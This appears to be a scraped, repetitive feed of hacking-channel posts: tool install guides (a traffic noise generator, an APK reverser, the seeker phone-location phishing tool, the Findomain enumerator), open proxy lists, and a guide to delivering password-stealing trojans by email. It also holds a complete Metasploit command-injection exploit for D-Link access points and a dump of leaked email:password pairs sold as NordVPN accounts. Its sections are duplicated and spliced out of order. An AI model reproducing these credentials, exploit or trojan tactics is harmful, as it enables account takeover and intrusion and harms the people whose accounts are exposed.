โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Simple random DNS, HTTP/S internet traffic noise generator Termux-Linux
fb.com/undercodeTesting
1) pip install requests
Usage
2) Clone the repository
> git clone https://github.com/1tayH/noisy.git
Navigate into the noisy directory
3) cd noisy
Run the script
4) python noisy.py --config config.json
The program can accept a number of command line arguments:
$ python noisy.py --help
5) usage: noisy.py [-h] [--log -l] --config -c [--timeout -t]
๐ฆ optional arguments:
-h, --help show this help message and exit
--log -l logging level
--config -c config file
--timeout -t for how long the crawler should be running, in seconds
only the config file argument is required.
๐ฆ Output
$ docker run -it noisy --config config.json --log debug
DEBUG:urllib3.connectionpool:Starting new HTTP connection (1): 4chan.org:80
DEBUG:urllib3.connectionpool:http://4chan.org:80 "GET / HTTP/1.1" 301 None
DEBUG:urllib3.connectionpool:Starting new HTTP connection (1): www.4chan.org:80
DEBUG:urllib3.connectionpool:http://www.4chan.org:80 "GET / HTTP/1.1" 200 None
DEBUG:root:found 92 links
๐ฆBuild the image VIA DOCKER :
1) docker build -t noisy .
Or if you'd like to build it for a Raspberry Pi (running Raspbian stretch):
2) docker build -f Dockerfile.pi -t noisy .
3) Create the container and run:
> docker run -it noisy --config config.json
E N J O Y
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Simple random DNS, HTTP/S internet traffic noise generator Termux-Linux
fb.com/undercodeTesting
1) pip install requests
Usage
2) Clone the repository
> git clone https://github.com/1tayH/noisy.git
Navigate into the noisy directory
3) cd noisy
Run the script
4) python noisy.py --config config.json
The program can accept a number of command line arguments:
$ python noisy.py --help
5) usage: noisy.py [-h] [--log -l] --config -c [--timeout -t]
๐ฆ optional arguments:
-h, --help show this help message and exit
--log -l logging level
--config -c config file
--timeout -t for how long the crawler should be running, in seconds
only the config file argument is required.
๐ฆ Output
$ docker run -it noisy --config config.json --log debug
DEBUG:urllib3.connectionpool:Starting new HTTP connection (1): 4chan.org:80
DEBUG:urllib3.connectionpool:http://4chan.org:80 "GET / HTTP/1.1" 301 None
DEBUG:urllib3.connectionpool:Starting new HTTP connection (1): www.4chan.org:80
DEBUG:urllib3.connectionpool:http://www.4chan.org:80 "GET / HTTP/1.1" 200 None
DEBUG:root:found 92 links
๐ฆBuild the image VIA DOCKER :
1) docker build -t noisy .
Or if you'd like to build it for a Raspberry Pi (running Raspbian stretch):
2) docker build -f Dockerfile.pi -t noisy .
3) Create the container and run:
> docker run -it noisy --config config.json
E N J O Y
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ 2020 Quickly analyze and reverse engineer Android packages
t.me/undercodeTesting
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
FEATURES :
Device info
Intents
Command execution
SQLite references
Logging references
Content providers
Broadcast recievers
Service references
File references
Crypto references
Hardcoded secrets
URL's
Network connections
SSL references
WebView references
๐ฆ อถUะฏ โ โ AT๊อถI
Iฬถอออฬฬฬอฬนฬฑอฬฐฬฬอ NฬธฬฬฬญฬฌฬฌฬอฬฐอฬกอฬฅSฬตออฬฬอฬฬฬบฬฬชTฬดฬ อฬฬ อฬออAฬดออฬฝฬฬอฬฬงฬออฬจฬฌฬ ฬญอฬชLฬถฬอ อฬฬฬฬอฬชLฬถฬฬฬฬฬฬฬอฬญออออฬ ฬดอ อฬฬฃฬฃฬฃอฬอฬจ&ฬตออฬอออฬปอฬงฬจฬฌฬคฬฬชอ ฬตฬฬออฬอฬฬฬฬฬฎอฬฬฒฬคฬRฬดฬออฬพฬอ ฬฏฬฬญฬ ฬฃอฬญฬงUฬดอฬฬฬอฬผฬชอNฬธออฬฬออฬผออ ฬฬฐอ ฬฬฆ
1) git clone https://github.com/1N3/ReverseAPK
2) cd RevereAPK
3) ./install
๐ฆTo use :
reverse-apk <apk_name>
@UndercodeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ 2020 Quickly analyze and reverse engineer Android packages
t.me/undercodeTesting
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
FEATURES :
Device info
Intents
Command execution
SQLite references
Logging references
Content providers
Broadcast recievers
Service references
File references
Crypto references
Hardcoded secrets
URL's
Network connections
SSL references
WebView references
๐ฆ อถUะฏ โ โ AT๊อถI
Iฬถอออฬฬฬอฬนฬฑอฬฐฬฬอ NฬธฬฬฬญฬฌฬฌฬอฬฐอฬกอฬฅSฬตออฬฬอฬฬฬบฬฬชTฬดฬ อฬฬ อฬออAฬดออฬฝฬฬอฬฬงฬออฬจฬฌฬ ฬญอฬชLฬถฬอ อฬฬฬฬอฬชLฬถฬฬฬฬฬฬฬอฬญออออฬ ฬดอ อฬฬฃฬฃฬฃอฬอฬจ&ฬตออฬอออฬปอฬงฬจฬฌฬคฬฬชอ ฬตฬฬออฬอฬฬฬฬฬฎอฬฬฒฬคฬRฬดฬออฬพฬอ ฬฏฬฬญฬ ฬฃอฬญฬงUฬดอฬฬฬอฬผฬชอNฬธออฬฬออฬผออ ฬฬฐอ ฬฬฆ
1) git clone https://github.com/1N3/ReverseAPK
2) cd RevereAPK
3) ./install
๐ฆTo use :
reverse-apk <apk_name>
@UndercodeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆPREMIUM PROXIES :
t.me/undercodeTesting
103.83.116.226 55443 ID Indonesia elite proxy no yes 1 minute ago
51.158.172.165 8811 FR France anonymous no yes 1 minute ago
51.158.165.18 8811 FR France anonymous no yes 1 minute ago
103.12.161.196 50514 KH Cambodia elite proxy no yes 1 minute ago
51.158.68.68 8811 FR France anonymous no yes 1 minute ago
117.242.36.210 43741 IN India elite proxy no yes 1 minute ago
167.172.188.118 3128 DE Germany elite proxy no yes 1 minute ago
201.64.22.50 8081 BR Brazil anonymous no yes 1 minute ago
94.230.156.143 55167 CZ Czech Republic elite proxy no yes 1 minute ago
94.230.158.37 42057 CZ Czech Republic elite proxy no yes 1 minute ago
51.158.119.88 8811 FR France anonymous no yes 1 minute ago
102.164.199.76 56605 ZA South Africa elite proxy no yes 1 minute ago
151.253.165.70 8080 AE United Arab Emirates elite proxy no yes 1 minute ago
144.217.101.242 3129 CA Canada elite proxy no yes 1 minute ago
@UndercodeTesting
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆPREMIUM PROXIES :
t.me/undercodeTesting
103.83.116.226 55443 ID Indonesia elite proxy no yes 1 minute ago
51.158.172.165 8811 FR France anonymous no yes 1 minute ago
51.158.165.18 8811 FR France anonymous no yes 1 minute ago
103.12.161.196 50514 KH Cambodia elite proxy no yes 1 minute ago
51.158.68.68 8811 FR France anonymous no yes 1 minute ago
117.242.36.210 43741 IN India elite proxy no yes 1 minute ago
167.172.188.118 3128 DE Germany elite proxy no yes 1 minute ago
201.64.22.50 8081 BR Brazil anonymous no yes 1 minute ago
94.230.156.143 55167 CZ Czech Republic elite proxy no yes 1 minute ago
94.230.158.37 42057 CZ Czech Republic elite proxy no yes 1 minute ago
51.158.119.88 8811 FR France anonymous no yes 1 minute ago
102.164.199.76 56605 ZA South Africa elite proxy no yes 1 minute ago
151.253.165.70 8080 AE United Arab Emirates elite proxy no yes 1 minute ago
144.217.101.242 3129 CA Canada elite proxy no yes 1 minute ago
@UndercodeTesting
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ2020 good tool- recommended :
>Accurately Locate Smartphones using Social Engineering
t.me/undercodeTesting
๐ฆ ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ :
A) Kali Linux / Ubuntu / Parrot OS
1) git clone https://github.com/thewhiteh4t/seeker.git
2) cd seeker/
3) chmod 777 install.sh
4) ./install.sh
B) BlackArch Linux
> pacman -S seeker
C ) Docker
> docker pull thewhiteh4t/seeker
D) Termux
1) git clone https://github.com/thewhiteh4t/seeker.git
2) cd seeker/
3) chmod 777 termux_install.sh
4) ./termux_install.sh
๐ฆ Usage
> python3 seeker.py -h
usage: seeker.py [-h] [-s SUBDOMAIN]
optional arguments:
-h, --help show this help message and exit
-s SUBDOMAIN, --subdomain Subdomain Provide Subdomain for Serveo URL ( Optional )
-k KML, --kml KML Provide KML Filename ( Optional )
-t TUNNEL, --tunnel TUNNEL Specify Tunnel Mode [manual]
# Example
# SERVEO
๐ฆTested by undercode on :
> parrot lastest v
> kali lastest v
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ2020 good tool- recommended :
>Accurately Locate Smartphones using Social Engineering
t.me/undercodeTesting
๐ฆ ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ :
A) Kali Linux / Ubuntu / Parrot OS
1) git clone https://github.com/thewhiteh4t/seeker.git
2) cd seeker/
3) chmod 777 install.sh
4) ./install.sh
B) BlackArch Linux
> pacman -S seeker
C ) Docker
> docker pull thewhiteh4t/seeker
D) Termux
1) git clone https://github.com/thewhiteh4t/seeker.git
2) cd seeker/
3) chmod 777 termux_install.sh
4) ./termux_install.sh
๐ฆ Usage
> python3 seeker.py -h
usage: seeker.py [-h] [-s SUBDOMAIN]
optional arguments:
-h, --help show this help message and exit
-s SUBDOMAIN, --subdomain Subdomain Provide Subdomain for Serveo URL ( Optional )
-k KML, --kml KML Provide KML Filename ( Optional )
-t TUNNEL, --tunnel TUNNEL Specify Tunnel Mode [manual]
# Example
# SERVEO
๐ฆTested by undercode on :
> parrot lastest v
> kali lastest v
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ 2020 The fastest and cross-platform subdomain enumerator
fb.com/undercodeTesting
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
FEATURES :
Subdomains monitoring: put data to Discord, Slack or Telegram webhooks. See Subdomains Monitoring for more information.
Multi-thread support for API querying, it makes that the maximun time that Findomain will take to search subdomains for any target is 15 seconds (in case of API's timeout).
Parallel support for subdomains resolution, in good network conditions can resolv about 3.5k of subdomains per minute.
DNS over TLS support.
Specific IPv4 or IPv6 query support.
Discover subdomains without brute-force, it tool uses Certificate Transparency Logs and APIs.
Discover only resolved subdomains.
Discover subdomains IP for data analisis.
Read target from user argument (-t) or file (-f).
Write to one unique output file specified by the user all or only resolved subdomains.
Write results to automatically named TXT output file(s).
Hability to query directly the Findomain database created with Subdomains Monitoring for previous discovered subdomains.
Hability to import and work data discovered by other tools.
Quiet mode to run it silently.
Cross platform support: Any platform, it's written in Rust and Rust is multiplatform. See the documentation for instructions.
Multiple API support.
Possibility to use as subdomain resolver.
Subdomain wildcard detection for accurate results.
Support for subdomain discover using bruteforce method.
Update checker. Use the --check-updates flag.
๐ฆ ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ :
Installation Android (Termux)
Install the Termux package, open it and follow it commands:
1) $ pkg install rust make perl
2) $ cargo install findomain
3) $ cd $HOME/.cargo/bin
4) $ ./findomain
๐ฆ Installation in Linux using source code
If you want to install it, you can do that manually compiling the source or using the precompiled binary.
Manually: You need to have rust, make and perl installed in your system first.
1) $ git clone https://github.com/Edu4rdSHL/findomain.git
2) $ cd findomain
3) $ cargo build --release
4) $ sudo cp target/release/findomain /usr/bin/
5) $ findomain
๐ฆ Installation in Linux using compiled artifacts
$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux
$ chmod +x findomain-linux
$ ./findomain-linux
๐ฆIf you are using the ArchLinux distribution or any ArchLinux-based distro, you just need to use:
$ pacman -S findomain
๐ฆ If you are using the Pentoo distribution, you just need to use:
$ emerge -a findomain
๐ฆ Installation Aarch64 (Raspberry Pi)
$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-aarch64
$ chmod +x findomain-aarch64
$ ./findomain-aarch64
๐ฆ Installation Windows
Download the binary from https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-windows.exe
Open a CMD shell and go to the dir where findomain-windows.exe was downloaded.
Exec: findomain-windows in the CMD shell.
๐ฆInstallation MacOS
You have two options to install Findomain in MacOS.
Using Homebrew:
$ brew install findomain
$ findomain
Manually from the repo:
$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-osx
$ chmod +x findomain-osx.dms
$ ./findomain-osx.dms
Installation NixOS
$ nix-env -i findomain
$ findomain
๐ฆInstallation Docker
You have two options to install Findomain in a docker container.
Using Dockerhub:
$ docker pull edu4rdshl/findomain:latest
$ docker run -it edu4rdshl/findomain:latest /bin/bash
$ findomain
๐ฆTested by undercode on
> win 10 pro for workstation lastest
> parrot
@undercodeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ 2020 The fastest and cross-platform subdomain enumerator
fb.com/undercodeTesting
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
FEATURES :
Subdomains monitoring: put data to Discord, Slack or Telegram webhooks. See Subdomains Monitoring for more information.
Multi-thread support for API querying, it makes that the maximun time that Findomain will take to search subdomains for any target is 15 seconds (in case of API's timeout).
Parallel support for subdomains resolution, in good network conditions can resolv about 3.5k of subdomains per minute.
DNS over TLS support.
Specific IPv4 or IPv6 query support.
Discover subdomains without brute-force, it tool uses Certificate Transparency Logs and APIs.
Discover only resolved subdomains.
Discover subdomains IP for data analisis.
Read target from user argument (-t) or file (-f).
Write to one unique output file specified by the user all or only resolved subdomains.
Write results to automatically named TXT output file(s).
Hability to query directly the Findomain database created with Subdomains Monitoring for previous discovered subdomains.
Hability to import and work data discovered by other tools.
Quiet mode to run it silently.
Cross platform support: Any platform, it's written in Rust and Rust is multiplatform. See the documentation for instructions.
Multiple API support.
Possibility to use as subdomain resolver.
Subdomain wildcard detection for accurate results.
Support for subdomain discover using bruteforce method.
Update checker. Use the --check-updates flag.
๐ฆ ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ :
Installation Android (Termux)
Install the Termux package, open it and follow it commands:
1) $ pkg install rust make perl
2) $ cargo install findomain
3) $ cd $HOME/.cargo/bin
4) $ ./findomain
๐ฆ Installation in Linux using source code
If you want to install it, you can do that manually compiling the source or using the precompiled binary.
Manually: You need to have rust, make and perl installed in your system first.
1) $ git clone https://github.com/Edu4rdSHL/findomain.git
2) $ cd findomain
3) $ cargo build --release
4) $ sudo cp target/release/findomain /usr/bin/
5) $ findomain
๐ฆ Installation in Linux using compiled artifacts
$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux
$ chmod +x findomain-linux
$ ./findomain-linux
๐ฆIf you are using the ArchLinux distribution or any ArchLinux-based distro, you just need to use:
$ pacman -S findomain
๐ฆ If you are using the Pentoo distribution, you just need to use:
$ emerge -a findomain
๐ฆ Installation Aarch64 (Raspberry Pi)
$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-aarch64
$ chmod +x findomain-aarch64
$ ./findomain-aarch64
๐ฆ Installation Windows
Download the binary from https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-windows.exe
Open a CMD shell and go to the dir where findomain-windows.exe was downloaded.
Exec: findomain-windows in the CMD shell.
๐ฆInstallation MacOS
You have two options to install Findomain in MacOS.
Using Homebrew:
$ brew install findomain
$ findomain
Manually from the repo:
$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-osx
$ chmod +x findomain-osx.dms
$ ./findomain-osx.dms
Installation NixOS
$ nix-env -i findomain
$ findomain
๐ฆInstallation Docker
You have two options to install Findomain in a docker container.
Using Dockerhub:
$ docker pull edu4rdshl/findomain:latest
$ docker run -it edu4rdshl/findomain:latest /bin/bash
$ findomain
๐ฆTested by undercode on
> win 10 pro for workstation lastest
> parrot
@undercodeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Most popular uses for Torjans- for beginers :
t.me/undercodeTesting
๐ฆ Trojan
1) Using trojans is the most stupid and unreliable way for network administrators, but it is suitable for ordinary users, because it is easier for them to plant the server part of the program. Although there are nonprofessionals among administrators, few people come across such jokes.
2) But who said that only they exist on the net? There are still a bunch of simple users with great privileges and a gullible soul. That is precisely what they need to be trojaned.
3) The Trojan program consists of two parts - the client and the server. The server needs to be thrown onto the victim's computer and made it run the file. Most often, the trojan is registered at startup and starts with the OS and is invisible in the system. After that, you connect to the server part using the client and perform the actions laid down in the program, for example, restarting the computer, stealing passwords, etc.
๐ฆ How to throw a trojan? The most common way is a mailbox. Just give the server-side executable some nice name and send a message to the victim.
1) The text of the letter should contain soft, but tempting calls to launch the attached file. This is the same as the spread of viruses, letters with which we see every day in our mailboxes. If the user starts the server part, then consider that you have become the king on his computer. Now you will have access to everything that a war horse can do for you.
2) If the Trojan program is aimed at stealing passwords, then after infection, it can quietly send a message with a password file to a specific E-mail address. Professionals easily find such addresses (using the debugging application), but this all stops. Professional hackers are not stupid, and for Trojans they register mail addresses on free services, and false information about the owner is indicated.
3) An attacker starts up a mailbox or checks it for letters with passwords only through an anonymous proxy server, and it becomes very difficult to find out the real IP address of a person.
4) Trojans have become very widespread due to the fact that it is not easy to calculate the author, subject to simple rules of anonymity. At the same time, using the programs themselves has become a primitive task.
5) The danger posed by trojans is also confirmed by the fact that most anti-virus programs began to scan not only for viruses, but also for trojans. For example, antivirus programs identify Back Orifice as Win32.BO virus.
Written by Undercode
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Most popular uses for Torjans- for beginers :
t.me/undercodeTesting
๐ฆ Trojan
1) Using trojans is the most stupid and unreliable way for network administrators, but it is suitable for ordinary users, because it is easier for them to plant the server part of the program. Although there are nonprofessionals among administrators, few people come across such jokes.
2) But who said that only they exist on the net? There are still a bunch of simple users with great privileges and a gullible soul. That is precisely what they need to be trojaned.
3) The Trojan program consists of two parts - the client and the server. The server needs to be thrown onto the victim's computer and made it run the file. Most often, the trojan is registered at startup and starts with the OS and is invisible in the system. After that, you connect to the server part using the client and perform the actions laid down in the program, for example, restarting the computer, stealing passwords, etc.
๐ฆ How to throw a trojan? The most common way is a mailbox. Just give the server-side executable some nice name and send a message to the victim.
1) The text of the letter should contain soft, but tempting calls to launch the attached file. This is the same as the spread of viruses, letters with which we see every day in our mailboxes. If the user starts the server part, then consider that you have become the king on his computer. Now you will have access to everything that a war horse can do for you.
2) If the Trojan program is aimed at stealing passwords, then after infection, it can quietly send a message with a password file to a specific E-mail address. Professionals easily find such addresses (using the debugging application), but this all stops. Professional hackers are not stupid, and for Trojans they register mail addresses on free services, and false information about the owner is indicated.
3) An attacker starts up a mailbox or checks it for letters with passwords only through an anonymous proxy server, and it becomes very difficult to find out the real IP address of a person.
4) Trojans have become very widespread due to the fact that it is not easy to calculate the author, subject to simple rules of anonymity. At the same time, using the programs themselves has become a primitive task.
5) The danger posed by trojans is also confirmed by the fact that most anti-virus programs began to scan not only for viruses, but also for trojans. For example, antivirus programs identify Back Orifice as Win32.BO virus.
Written by Undercode
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ TESTED BY UNDERCODE 2020 BUG
D-LINK 2020 Authenticated Remote Command Injection
t.me/undercodeTesting
This module requires Metasploit: https://metasploit.com/download
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'DLINK DWL-2600 Authenticated Remote Command Injection',
'Description' => %q{
Some DLINK Access Points are vulnerable to an authenticated OS command injection.
Default credentials for the web interface are admin/admin.
},
'Author' =>
[
'RAKI BEN HAMOUDA', # Vulnerability discovery and original research
'Nick Starke' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2019-20499' ],
[ 'EDB', '46841' ]
],
'DisclosureDate' => 'May 15 2019',
'Privileged' => true,
'Platform' => %w{ linux unix },
'Payload' =>
{
'DisableNops' => true,
'BadChars' => "\x00"
},
'CmdStagerFlavor' => :wget,
'Targets' =>
[
[ 'CMD',
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
}
],
[ 'Linux mips Payload',
{
'Arch' => ARCH_MIPSLE,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 1
))
register_options(
[
OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'admin' ]),
OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]),
OptString.new('TARGETURI', [ true, 'Base path to the Dlink web interface', '/' ])
])
end
def execute_command(cmd, opts={})
bogus = Rex::Text.rand_text_alpha(rand(10))
post_data = Rex::MIME::Message.new
post_data.add_part("up", nil, nil, "form-data; name=\"optprotocol\"")
post_data.add_part(bogus, nil, nil, "form-data; name=\"configRestore\"")
post_data.add_part("; #{cmd} ;", nil, nil, "form-data; name=\"configServerip\"")
print_status("Sending CGI payload using token: #{@token}") # Note token is an instance variable now
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin.cgi'),
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => "sessionHTTP=#{@token};",
'data' => post_data.to_s,
'query' => 'action=config_restore'
})
unless res || res.code != 200
fail_with(Failure::UnexpectedReply, "Command wasn't executed, aborting!")
end
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
return
end
def exploit
user = datastore['HttpUsername']
pass = datastore['HttpPassword']
rhost = datastore['RHOST']
rport = datastore['RPORT']
print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/admin.cgi'),
'method' => 'POST',
'vars_post' => {
'i_username' => user,
'i_password' => pass,
'login' => 'Logon'
}
})
unless res && res.code != 404
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
end
unless [200, 301, 302].include?(res.code)
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
end
print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
delstart = 'var cookieValue = "'
tokenoffset = res.body.index(delstart) + delstart.size
endoffset = res.body.index('";', tokenoffset)
@token = res.body[tokenoffset, endoffset - tokenoffset]
if @token.empty?
๐ฆ TESTED BY UNDERCODE 2020 BUG
D-LINK 2020 Authenticated Remote Command Injection
t.me/undercodeTesting
This module requires Metasploit: https://metasploit.com/download
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'DLINK DWL-2600 Authenticated Remote Command Injection',
'Description' => %q{
Some DLINK Access Points are vulnerable to an authenticated OS command injection.
Default credentials for the web interface are admin/admin.
},
'Author' =>
[
'RAKI BEN HAMOUDA', # Vulnerability discovery and original research
'Nick Starke' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2019-20499' ],
[ 'EDB', '46841' ]
],
'DisclosureDate' => 'May 15 2019',
'Privileged' => true,
'Platform' => %w{ linux unix },
'Payload' =>
{
'DisableNops' => true,
'BadChars' => "\x00"
},
'CmdStagerFlavor' => :wget,
'Targets' =>
[
[ 'CMD',
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
}
],
[ 'Linux mips Payload',
{
'Arch' => ARCH_MIPSLE,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 1
))
register_options(
[
OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'admin' ]),
OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]),
OptString.new('TARGETURI', [ true, 'Base path to the Dlink web interface', '/' ])
])
end
def execute_command(cmd, opts={})
bogus = Rex::Text.rand_text_alpha(rand(10))
post_data = Rex::MIME::Message.new
post_data.add_part("up", nil, nil, "form-data; name=\"optprotocol\"")
post_data.add_part(bogus, nil, nil, "form-data; name=\"configRestore\"")
post_data.add_part("; #{cmd} ;", nil, nil, "form-data; name=\"configServerip\"")
print_status("Sending CGI payload using token: #{@token}") # Note token is an instance variable now
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin.cgi'),
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => "sessionHTTP=#{@token};",
'data' => post_data.to_s,
'query' => 'action=config_restore'
})
unless res || res.code != 200
fail_with(Failure::UnexpectedReply, "Command wasn't executed, aborting!")
end
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
return
end
def exploit
user = datastore['HttpUsername']
pass = datastore['HttpPassword']
rhost = datastore['RHOST']
rport = datastore['RPORT']
print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/admin.cgi'),
'method' => 'POST',
'vars_post' => {
'i_username' => user,
'i_password' => pass,
'login' => 'Logon'
}
})
unless res && res.code != 404
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
end
unless [200, 301, 302].include?(res.code)
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
end
print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
delstart = 'var cookieValue = "'
tokenoffset = res.body.index(delstart) + delstart.size
endoffset = res.body.index('";', tokenoffset)
@token = res.body[tokenoffset, endoffset - tokenoffset]
if @token.empty?
print_good("#{peer} - Received Auth token: #{@token}")
if target.name =~ /CMD/
unless datastore['CMD']
end
fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
end
execute_command(payload.encoded)
else
execute_cmdstager(linemax: 100, noconcat: true)
end
end
end
@UndercodeTesting
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
if target.name =~ /CMD/
unless datastore['CMD']
end
fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
end
execute_command(payload.encoded)
else
execute_cmdstager(linemax: 100, noconcat: true)
end
end
end
@UndercodeTesting
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ NEW 50 WORKING NORDVPN-TESTED @UNDERCODETESTING
zayzay451@gmail.com:Madman123
mrmcby@gmail.com:Marshall5599
km.skazka@gmail.com:shust0517
fabslayer@hotmail.com:arena007
jmorris835@hotmail.com:15Feb1944
stevechambers15t@gmail.com:station1
tripp.welge@gmail.com:thurlow84
fgrodkowski2003@gmail.com:Filip2003
jorge.vega.herrera@gmail.com:Gazelem1804
coltongdudley@gmail.com:facebook5
tqco@netzero.net:richest3
willrocks012@gmail.com:Azsxdc12
thealockett@yandex.com:Welcome1
manhtungvu@gmail.com:J3shockg4
darrenldl@hotmail.com:darren10
mailbothra@gmail.com:n123456b
robwilliamsffc@yahoo.co.uk:Fulhamfc1
dcichocki27@hotmail.com:Billyboy12
issah@me.com:mouslim1
supremewildmonkey@gmail.com:Gameflow1
great.dispair@gmail.com:Greatdespair4110
jerome_sollberger@hotmail.com:paheseair1991
alinyear2002@hotmail.com:bd050111
travismcneill@ymail.com:Tarheels23
pace987@yahoo.com:Frogger01
julien.rom98@gmail.com:Julien1998
ordenmuslig@outlook.de:Ordeni31
imransyedbbm@gmail.com:syed28091978
seth.ritter2@gmail.com:CVFootball63
kevhan9@yahoo.com:kel9star
caleb.bryce.scott@gmail.com:Kickflip1
farhood_nomad1985@yahoo.com:squasher
theblazian@gmail.com:doreena21
bluerpk@gmail.com:blue0000ff
ddiaz01@yahoo.com:daviddiaz2011
josef.bremberger@googlemail.com:Avalanche123
mdanford21@outlook.com:Saints2010
daymoon83@hotmail.fr:Carvalho83500
ayasofia89@gmail.com:calin2404
hewson72@hotmail.com:02Camaro
salt33447@gmail.com:Challenger2015
lorenlsimpson@gmail.com:Starwars10
ddrabick@yahoo.com:Helloduhh10
benji512512@gmail.com:Brady5126
ajoker1895@hotmail.com:Theamity1895
arazukie@gmail.com:Poopface12
haroonaltaf@hotmail.com:Haytch123
melaniewalk@gmail.com:dagmar0408
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ NEW 50 WORKING NORDVPN-TESTED @UNDERCODETESTING
zayzay451@gmail.com:Madman123
mrmcby@gmail.com:Marshall5599
km.skazka@gmail.com:shust0517
fabslayer@hotmail.com:arena007
jmorris835@hotmail.com:15Feb1944
stevechambers15t@gmail.com:station1
tripp.welge@gmail.com:thurlow84
fgrodkowski2003@gmail.com:Filip2003
jorge.vega.herrera@gmail.com:Gazelem1804
coltongdudley@gmail.com:facebook5
tqco@netzero.net:richest3
willrocks012@gmail.com:Azsxdc12
thealockett@yandex.com:Welcome1
manhtungvu@gmail.com:J3shockg4
darrenldl@hotmail.com:darren10
